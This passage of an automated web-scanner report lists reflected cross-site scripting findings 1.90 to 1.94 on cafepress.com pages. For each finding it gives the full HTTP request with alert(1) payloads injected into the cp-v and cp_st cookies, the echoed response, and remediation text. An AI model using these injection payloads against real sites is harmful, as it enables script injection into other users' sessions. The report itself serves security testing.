GET /cp/info/help/tos.aspx HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=dc886</script><script>alert(1)</script>e31d106e7a6 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 62950 Date: Sun, 26 Dec 2010 13:46:51 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 62950 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... n_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'HelpPage' window.cafepress.tealeaf.searchTerm = 'dc886</script><script>alert(1)</script>e31d106e7a6 ' window.cafepress.tealeaf.salesChannel = 'Other' window.cafepress.tealeaf.trafficMedium = 'OMM' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_0...[SNIP]...
1.90. http://www.cafepress.com/cp/info/sell/index.aspx [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /cp/info/sell/index.aspx
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 993ac"-alert(1)-"2f0f584fdd2 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/info/sell/index.aspx HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA993ac"-alert(1)-"2f0f584fdd2 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 51652 Date: Sun, 26 Dec 2010 13:46:47 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 51652 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA993ac"-alert(1)-"2f0f584fdd2 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.91. http://www.cafepress.com/cp/info/sell/index.aspx [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /cp/info/sell/index.aspx
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41f40</script><script>alert(1)</script>dbb7f115d79 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/info/sell/index.aspx HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=41f40</script><script>alert(1)</script>dbb7f115d79 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 51674 Date: Sun, 26 Dec 2010 13:46:45 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 51674 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... s.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = '/cp/info/sell/index.aspx' window.cafepress.tealeaf.searchTerm = '41f40</script><script>alert(1)</script>dbb7f115d79 ' window.cafepress.tealeaf.salesChannel = 'Other' window.cafepress.tealeaf.trafficMedium = 'OMM' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_0...[SNIP]...
1.92. http://www.cafepress.com/cp/sitemap/ [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /cp/sitemap/
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8570a"-alert(1)-"90117c7ff9b was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/sitemap/ HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA8570a"-alert(1)-"90117c7ff9b ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 147634 Date: Sun, 26 Dec 2010 13:46:52 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 147634 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA8570a"-alert(1)-"90117c7ff9b "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.93. http://www.cafepress.com/cp/sitemap/ [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /cp/sitemap/
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1af17</script><script>alert(1)</script>e3cc51a30ee was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/sitemap/ HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=1af17</script><script>alert(1)</script>e3cc51a30ee ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 149634 Date: Sun, 26 Dec 2010 13:46:50 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 149634 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... ess.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = '/cp/sitemap/index.aspx' window.cafepress.tealeaf.searchTerm = '1af17</script><script>alert(1)</script>e3cc51a30ee ' window.cafepress.tealeaf.salesChannel = 'Other' window.cafepress.tealeaf.trafficMedium = 'OMM' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_0...[SNIP]...
1.94. http://www.cafepress.com/cp/viewcart.aspx [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /cp/viewcart.aspx
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e199a"-alert(1)-"33c6f5a13e was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/viewcart.aspx?s=search HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BAe199a"-alert(1)-"33c6f5a13e ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
